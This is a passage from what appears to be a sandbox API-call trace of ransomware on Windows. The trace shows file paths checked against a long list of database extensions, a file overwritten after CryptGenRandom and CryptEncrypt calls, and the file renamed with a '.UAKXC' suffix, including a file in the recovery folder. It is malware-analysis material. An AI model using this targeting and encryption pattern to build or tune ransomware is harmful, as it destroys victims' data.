(lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.271] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.272] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.273] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.273] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.273] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.273] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.273] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.273] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.273] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".vis") returned=".VISIO_PRM.14.1033.hxn" [0141.273] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.273] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.318] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.318] SetEndOfFile (hFile=0x6c4) returned 1 [0141.344] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.344] ReadFile (in: hFile=0x6c4, lpBuffer=0x5030000, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x3abfc88, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc88*=0x15e, lpOverlapped=0x0) returned 1 [0141.344] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.344] WriteFile (in: hFile=0x6c4, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x3abfc44, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc44*=0x15e, lpOverlapped=0x0) returned 1 [0141.345] CloseHandle (hObject=0x6c4) returned 1 [0141.346] GetProcessHeap () returned 0xea0000 [0141.346] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0141.346] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" [0141.346] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.UAKXC" [0141.346] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn.uakxc")) returned 1 [0141.431] GetProcessHeap () returned 0xea0000 [0141.431] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0141.432] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeef148 | out: hHeap=0xea0000) returned 1 [0141.432] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2718 | out: hHeap=0xea0000) returned 1 [0141.432] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0141.432] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0141.432] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0141.433] GetFileAttributesW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim")) returned 0x2006 [0141.557] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0141.557] GetLastError () returned 0x0 [0141.557] GetFileSizeEx (in: hFile=0x6cc, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=169213970) returned 1 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".4dd") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".4dl") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".accdb") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".accdc") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".accde") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".accdr") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".accdt") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".accft") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".adb") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".ade") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".adf") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".adp") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".arc") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".ora") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".alf") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".ask") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".btr") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".bdf") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".cat") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".cdb") returned 0x0 [0141.558] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".ckp") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".cma") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".cpd") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dacpac") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dad") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dadiagrams") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".daschema") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".db") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".db-shm") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".db-wal") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".db3") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dbc") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dbf") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dbs") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dbt") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dbv") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dbx") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dcb") returned 0x0 [0141.559] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dct") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dcx") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".ddl") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dlis") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dp1") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dqy") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dsk") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dsn") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dtsx") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".dxl") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".eco") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".ecx") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".edb") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".epim") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".exb") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".fcd") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".fdb") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".fic") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".fmp") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".fmp12") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".fmpsl") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".fol") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".fp3") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".fp4") returned 0x0 [0141.560] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".fp5") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".fp7") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".fpt") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".frm") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".gdb") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".grdb") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".gwi") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".hdb") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".his") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".ib") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".idb") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".ihx") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".itdb") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".itw") returned 0x0 [0141.561] StrStrIW 